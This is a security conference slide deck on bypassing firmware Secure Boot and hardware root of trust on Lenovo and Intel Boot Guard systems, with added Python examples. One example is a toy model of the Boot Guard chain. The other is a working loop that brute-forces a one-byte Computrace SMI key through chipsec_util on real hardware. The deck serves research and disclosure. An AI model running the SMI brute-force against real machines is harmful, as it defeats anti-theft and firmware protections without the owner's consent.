MODERN SECURE BOOT ATTACKS:
BYPASSING HARDWARE ROOT OF TRUST FROM SOFTWARE
Alex Matrosov
@matrosov
Leading Offensive Security REsearch at
Who We Are: Alex Matrosov
Former Security Researcher @Cylance @Intel @ESET
Doing Security REsearch since 1997
Book co-author nostarch.com/rootkits
@matrosov
Disclaimer
I don’t speak for my employer.
All opinions and information here
are my own responsibility
😈 (including all bad jokes) 😈
REsearch Target
Agenda
What is Hardware Root of Trust?
Computrace Never Dies
✓ OS Enable/Disable
✓ Permanent Disabling is a joke o_O
SMI over WMI is too evil 😈
✓ SMM communications without ring-0
✓ WMI-based fileless FW rootkits?
EC is not a security boundary 🤦♂️
(*EC – Embedded Controller)
Hardware Root of Trust
WTF Hardware Root of Trust?
➢ Root of Trust baked in pure Hardware?
✓ Can't be extracted/modified from software (implemented in RTL)?
✓ Not flexible for OEMs
✓ Hard to support in the field (updates, etc.)
✓ Hard to implement a secure way to cooperate with firmware on the same chip
➢ In most cases a Hardware Root of Trust
is a mix of firmware and a value locked in a FUSE
or by a specific bit.
➢ Secure state transition between hardware and
firmware is hard. Something is always missing.
UEFI vulns classification
UEFI Vulnerabilities
➢ Result of Exploitation
  ✓ Secure Boot Bypass
  ✓ SMM Privilege Escalation
  ✓ UEFI Firmware Implant
      ✓ Persistent Non-SMM (DXE, PEI)
      ✓ Persistent SMM (DXE)
      ✓ Not Persistent SMM (shellcode)
➢ Compromised Supply Chain
  ✓ BIOS Update Issues
      ✓ Outdated BIOS with known issues
      ✓ Not Authenticated BIOS Updates
      ✓ Implanted BIOS update image
  ✓ Weak Configuration
      ✓ Wrong Configured Protections
      ✓ Not Secure Root of Trust
      ✓ Malicious Peripheral Devices
https://medium.com/@matrosov/uefi-vulnerabilities-classification-4897596e60af
Boot Guard: Boot Flow in Perfect World
Locked in Hardware:
CPU Reset → CPU Microcode → Boot Guard ACM → Reset Vector
Locked in BIOS:
IBB (SEC + PEI) → Secure Boot (DXE + BDS) → OS Loader
HW Root of Trust: TPM is broken?
@uffeux @qrs
https://github.com/nccgroup/TPMGenie
@0x446f49
https://pulsesecurity.co.nz/articles/TPM-sniffing
HW Root of Trust: TPM is broken?
https://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Seunghun-Finally-I-Can-Sleep-Tonight-Catching-Sleep-Mode-Vulnerabilities-of-the-TPM-with-the-Napper.pdf
Boot Guard: Boot Flow in REAL World
Locked in Hardware:
CPU Reset → CPU Microcode → Boot Guard ACM → Reset Vector
Locked in BIOS:
IBB (SEC + PEI) → Secure Boot (DXE + BDS) → OS Loader
But world is not perfect :)
https://github.com/LongSoft/UEFITool
Why don't we lock everything in HW?
➢ Hardware is not flexible and is expensive
✓ OEMs don't like locked secrets (supply chain)
✓ The cost of a vulnerability is very high (no updates)
➢ All vendors are reducing HW-locked secrets
✓ Even one locked bit in HW is enough to call a feature "HW-locked"
✓ A mix of Hardware + Firmware is common in actual implementations
The HW manufacturing supply chain is very complex
https://www.blackhat.com/asia-19/briefings/schedule/index.html#intel-visa-through-the-rabbit-hole-13513
Intel Boot Guard:
New Ways to Bypass
How a HW-based Root of Trust becomes SW
➢ Recovery mode is evil 😈
➢ Secure transition of the Chain of Trust between
boot stages is slow and hard
➢ In most cases, without a hard reset, the Root
of Trust moves to pure software for performance
➢ Enterprise hardware needs remote update tools
➢ Nobody uses Intel BIOS Guard, not even Intel :)
How a HW-based Root of Trust becomes SW
https://embedi.org/blog/nuclear-explotion/
How a HW-based Root of Trust becomes SW
https://2018.zeronights.ru/en/wp-content/uploads/materials/06-NUClear-explotion.pdf
Boot Guard Bypass
Platform Controller Hub (PCH) / Management Engine (ME):
Field Programmable Fuse (FPF): hash of root OEM pub key (SHA-256)
RW UEFI Firmware Image:
Key Manifest (KM):
✓ key manifest security version number (SVN)
✓ hash of IBBM pub key (SHA-256)
✓ OEM root pub key (RSA-2048)
✓ RSA signature on KM SVN + hash of IBBM pub key
Initial Boot Block Manifest (IBBM):
✓ IBBM security version number (SVN)
✓ hash of IBB (SHA-256)
✓ IBBM pub key (RSA-2048)
✓ RSA signature on IBBM SVN + hash of IBB
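The chain drawn above, walked end to end as an added worked example (this is illustration code written for this page, not Intel's ACM logic or the author's tooling). The structure follows the slide: the FPF in the PCH/ME holds the SHA-256 of the OEM root public key; the KM, signed by the OEM root key, binds the IBBM public key; the IBBM, signed by that key, binds the IBB hash; the ACM checks each link before the IBB runs. Assumptions made here: RSA keys are textbook RSA built from known Mersenne primes (instant to construct, trivially factorable, illustration only, no padding), manifests are plain dicts, the minimum SVNs are kept next to the FPF, and an unprovisioned FPF is modelled as "policy not enforced", which is the manufacturing-mode case on the slides that follow.

```python
"""Toy model of the Boot Guard verification chain: FPF -> KM -> IBBM -> IBB."""
import hashlib

E = 65537
# Mersenne primes M521, M127, M607, M89: fine for a demo, never for a real key.
OEM_PRIMES = ((1 << 521) - 1, (1 << 127) - 1)
IBBM_PRIMES = ((1 << 607) - 1, (1 << 89) - 1)


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def toy_rsa_key(p: int, q: int) -> dict:
    n, phi = p * q, (p - 1) * (q - 1)
    return {"n": n, "e": E, "d": pow(E, -1, phi)}


def pub(key: dict) -> dict:
    return {"n": key["n"], "e": key["e"]}


def pub_bytes(key: dict) -> bytes:
    """Canonical public-key encoding that gets hashed into the FPF and the KM."""
    n = key["n"]
    return n.to_bytes((n.bit_length() + 7) // 8, "big") + key["e"].to_bytes(4, "big")


def sign(key: dict, data: bytes) -> int:
    # Textbook RSA over the SHA-256 digest (no padding); every n here is > 2**256.
    return pow(int.from_bytes(sha256(data), "big"), key["d"], key["n"])


def verify(pubkey: dict, data: bytes, sig: int) -> bool:
    return pow(sig, pubkey["e"], pubkey["n"]) == int.from_bytes(sha256(data), "big")


def build_km(oem_key: dict, ibbm_pub: dict, svn: int) -> dict:
    """KM: SVN + hash of the IBBM public key, signed by the OEM root key."""
    body = bytes([svn]) + sha256(pub_bytes(ibbm_pub))
    return {"svn": svn, "ibbm_key_hash": sha256(pub_bytes(ibbm_pub)),
            "oem_pub": pub(oem_key), "sig": sign(oem_key, body)}


def build_ibbm(ibbm_key: dict, ibb: bytes, svn: int) -> dict:
    """IBBM: SVN + hash of the IBB, signed by the IBBM key."""
    body = bytes([svn]) + sha256(ibb)
    return {"svn": svn, "ibb_hash": sha256(ibb),
            "ibbm_pub": pub(ibbm_key), "sig": sign(ibbm_key, body)}


def acm_verify(fpf: dict, km: dict, ibbm: dict, ibb: bytes) -> str:
    """Return "IBB_OK" or the name of the first link in the chain that fails."""
    if not fpf["provisioned"]:
        # Assumed model of manufacturing mode: no policy fused, so the ACM
        # enforces nothing and whatever sits in writable SPI flash simply runs.
        return "IBB_UNVERIFIED"
    if sha256(pub_bytes(km["oem_pub"])) != fpf["oem_key_hash"]:
        return "KM_KEY_NOT_IN_FPF"
    if not verify(km["oem_pub"], bytes([km["svn"]]) + km["ibbm_key_hash"], km["sig"]):
        return "KM_BAD_SIGNATURE"
    if km["svn"] < fpf["min_km_svn"]:
        return "KM_ROLLBACK"
    if sha256(pub_bytes(ibbm["ibbm_pub"])) != km["ibbm_key_hash"]:
        return "IBBM_KEY_NOT_IN_KM"
    if not verify(ibbm["ibbm_pub"], bytes([ibbm["svn"]]) + ibbm["ibb_hash"], ibbm["sig"]):
        return "IBBM_BAD_SIGNATURE"
    if ibbm["svn"] < fpf["min_ibbm_svn"]:
        return "IBBM_ROLLBACK"
    if sha256(ibb) != ibbm["ibb_hash"]:
        return "IBB_HASH_MISMATCH"
    return "IBB_OK"


def demo() -> dict:
    """Clean boot plus the tamper cases the chain is meant to stop."""
    oem_key = toy_rsa_key(*OEM_PRIMES)
    ibbm_key = toy_rsa_key(*IBBM_PRIMES)
    ibb = b"constructed stand-in for the SEC+PEI code (IBB)"
    fpf = {"provisioned": True, "oem_key_hash": sha256(pub_bytes(oem_key)),
           "min_km_svn": 1, "min_ibbm_svn": 2}
    km = build_km(oem_key, pub(ibbm_key), svn=1)
    ibbm = build_ibbm(ibbm_key, ibb, svn=2)
    patched_ibb = ibb + b"\x90"                                  # modified in SPI flash
    rogue_key = toy_rsa_key((1 << 521) - 1, (1 << 89) - 1)      # attacker's own key
    return {
        "clean": acm_verify(fpf, km, ibbm, ibb),
        "patched_ibb": acm_verify(fpf, km, ibbm, patched_ibb),
        "resigned_with_rogue_key": acm_verify(
            fpf, km, build_ibbm(rogue_key, patched_ibb, 2), patched_ibb),
        "old_ibbm_replayed": acm_verify(fpf, km, build_ibbm(ibbm_key, ibb, 1), ibb),
        "manufacturing_mode": acm_verify({**fpf, "provisioned": False}, km, ibbm, patched_ibb),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:26s} {result}")
```

The point of the last case is the one the rest of the deck makes: every other tampering attempt is caught at the link that binds it, but once the FPF side of the chain is not enforced, the same "hardware" root of trust verifies nothing and the chain is only as strong as the writable firmware image.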
Boot Guard Bypass: LenovoPcdInit
Boot Guard: Boot Flow in ACTIVE manufacturing mode
Locked in Hardware:
CPU Reset → CPU Microcode → Boot Guard ACM → Reset Vector
Locked in BIOS:
IBB (SEC + PEI) → Secure Boot (DXE + BDS) → OS Loader
Boot Guard Bypass: Where is the Lenovo PCD stored?
Boot Guard Bypass: Going deeper with SPI dump
Why do vendors leave these "backdoors"?
➢ To make a recovery process for broken BIOS updates
possible (even remotely).
➢ But leaving "backdoors" always creates other
problems, even more serious ones.
➢ The enterprise market needs stable solutions, right? ☺
➢ Replacing broken HW is the expensive way, but the only one which
guarantees a secure system recovery process
SMI over WMI is evil
How many exploits you need?
https://medium.com/@matrosov/dangerous-update-tools-c246f7299459
How did this REsearch get started?
https://docs.microsoft.com/en-us/windows/desktop/cimwin32prov/win32-bios
SMI over WMI is evil
https://download.lenovo.com/pccbbs/mobiles_pdf/kbl-r_deploy_01.pdf
How did this REsearch get started?
WTF LenovoSetupUnderOs (Smm/Dxe)?
➢ LenovoSetupUnderOsDxe (0D648466-36BD-42c6-B287-7C3BAA2575C0)
✓ Communicates with LenovoPasswordManagerDxe
➢ LenovoSetupUnderOsSmm (65A72030-B02E-4bf3-8424-BA5F2FC56DE7)
➢ Multiple WSMI Handlers (~12 SMI handlers):
✓ Get/Set BiosPassword
✓ Get/Set BiosSettings
➢ LenovoHiddenSetting
✓ ComputraceDisable
✓ CpuDebugEnable
Setup Automation SMI?
➢ ChangeConfiguration 0x04
➢ ChangePassword 0x81
➢ ChangeBootOrder 0xA7
➢ SecureBootConfiguration 0xAE
➢ It’s more: 0x0f, 0x80, 0x82, 0x9F, 0xB4/B6/B8
Computrace Never Dies
How I got back to my old Computrace REsearch
https://github.com/REhints/Publications/tree/master/Conferences/UEFI%20Firmware%20Rootkits%20Myths%20and%20Reality
Lenovo security configs
ComputraceSmiServices->Register Callbacks
https://github.com/REhints/Publications/tree/master/Conferences/UEFI%20Firmware%20Rootkits%20Myths%20and%20Reality
Computrace SMI Handlers
➢ ComputraceEnable = 0x85
➢ ComputraceDisable = 0x87
➢ ComputraceState = 0x88
➢ ComputraceEnableAction = 0x8d
➢ ComputraceDisableAction = 0x8e
SmiComputraceEnable = 0x85
SmiComputraceDisable = 0x87
Brute-force the Lenovo Computrace Disable Key
➢ Computrace Disable Secret Key
✓ 1 BYTE secret value ☺ stored in SPI flash (NVRAM)
✓ Can differ by laptop model line
(my sweet victims P50 and T540P have different keys)
import subprocess
for i in range(0, 256):
    subprocess.run(["chipsec_util", "smi", "0x0", "0x85", "0x0", hex(i)])
Fuzz->Check->Repeat->Profit!
DisableSecretKey == 0x57 o_O
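The Fuzz->Check->Repeat loop above with the "Check" step filled in, as an added example (not the author's tooling). The SMI codes are the ones listed on the Computrace SMI Handlers slide (0x85, 0x87, 0x88) and the real transport is the same `chipsec_util smi 0x0 <code> <data> <rax>` command form as above. Because that transport needs the chipsec driver and a Lenovo box, `SimulatedComputraceSmm` is a constructed stand-in with the same calling shape so the loop runs offline; its internals are assumptions, not taken from the slides: one secret byte in "NVRAM" gates both the Enable and Disable handlers, the machine starts "permanently disabled" (the state the deck says is a joke), and the check is done by reading state back through ComputraceState (0x88) and watching for a change from the baseline. With the real transport the check compares whatever `chipsec_util` prints for the SMI result, which assumes the tool prints the returned registers.

```python
"""Brute-force a 1-byte SMI secret: fire every key, read state back, stop on change."""
import subprocess

SMI_COMPUTRACE_ENABLE = 0x85   # codes from the Computrace SMI Handlers slide
SMI_COMPUTRACE_DISABLE = 0x87
SMI_COMPUTRACE_STATE = 0x88


class SimulatedComputraceSmm:
    """Constructed stand-in for the firmware side (semantics assumed): one
    secret byte in "NVRAM" gates the Enable (0x85) and Disable (0x87)
    handlers; the State (0x88) handler reports the current flag."""

    def __init__(self, secret_key: int, state: str = "permanently_disabled"):
        self.nvram_secret = secret_key & 0xFF
        self.state = state

    def smi(self, code: int, data: int, rax: int) -> int:
        if code == SMI_COMPUTRACE_STATE:
            return 1 if self.state == "enabled" else 0
        if code in (SMI_COMPUTRACE_ENABLE, SMI_COMPUTRACE_DISABLE):
            if (rax & 0xFF) != self.nvram_secret:
                return 0xFF                      # wrong key: refused, state unchanged
            self.state = "enabled" if code == SMI_COMPUTRACE_ENABLE else "permanently_disabled"
            return 0
        return 0xFF                              # unknown handler


def chipsec_transport(code: int, data: int, rax: int) -> str:
    """Real transport: the page's `chipsec_util smi 0x0 <code> <data> <rax>`.
    Returns the tool's stdout so the caller can diff it against a baseline
    (assumes chipsec prints the SMI result registers; needs the chipsec driver)."""
    cmd = ["chipsec_util", "smi", "0x0", hex(code), hex(data), hex(rax)]
    return subprocess.run(cmd, check=False, capture_output=True, text=True).stdout


def read_state(smi):
    return smi(SMI_COMPUTRACE_STATE, 0x0, 0x0)


def bruteforce_key(smi, target_smi: int = SMI_COMPUTRACE_ENABLE):
    """Fuzz -> Check -> Repeat: fire target_smi with each of the 256 possible
    keys and stop at the first one that changes the reported state.
    Returns (key, attempts), or (None, 256) if no key moved the state."""
    baseline = read_state(smi)
    for key in range(256):
        smi(target_smi, 0x0, key)                # Fuzz
        if read_state(smi) != baseline:          # Check
            return key, key + 1                  # Profit
    return None, 256                             # Repeat on another handler / model


def demo() -> dict:
    fw = SimulatedComputraceSmm(secret_key=0x57)     # the value found on the slide
    key, attempts = bruteforce_key(fw.smi)
    return {"key": key, "attempts": attempts, "state_after": fw.state}


if __name__ == "__main__":
    print(demo())   # swap fw.smi for chipsec_transport on real hardware
```

A 1-byte key space means the loop finishes in at most 256 SMIs; nothing on the firmware side rate-limits or locks out after failed attempts in this model, which is exactly why a secret that short offers no protection once any ring-0 (or, via WMI, non-ring-0) caller can reach the handler.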
Embedded Controller is not
a security boundary
Summary:
Usability in the enterprise world is in many cases
the main enemy of security
Vendors understand the "Permanent Disable" option
differently
When a Hardware-based Root of Trust transfers the
state of the Chain of Trust to software, it's not
hardware anymore
Thank you for your attention!
@matrosov